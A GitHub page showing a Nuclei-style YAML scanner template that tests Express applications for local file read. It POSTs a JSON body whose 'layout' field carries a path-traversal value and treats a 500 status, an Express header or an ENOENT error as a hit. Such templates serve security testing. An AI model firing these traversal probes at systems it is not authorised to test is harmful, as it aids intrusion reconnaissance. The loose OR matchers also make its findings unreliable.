-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathlfr_express.yaml
40 lines (37 loc) · 942 Bytes
/
lfr_express.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: Express-LFR-json
info:
name: LFR in Express via json
author: nithissh
severity: medium
requests:
- method: POST
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Content-Type: application/json
body: "{\"profile\":{\"layout\": \"./../routes/indfsfdsdex.js\"}}"
matchers-condition: or
matchers:
- type: status
status:
- 500
- type: word
words:
- "X-Powered-By: Express"
part: header
- type: word
words:
- "ENOENT: no such file or directory"
# matchers-condition: or
# matchers:
# - type: status
# status:
# - 500
# - type: word
# words:
# - "X-Powered-By: Express"
# part: header
# - type: word
# words:
# - "ENOENT: no such file or directory"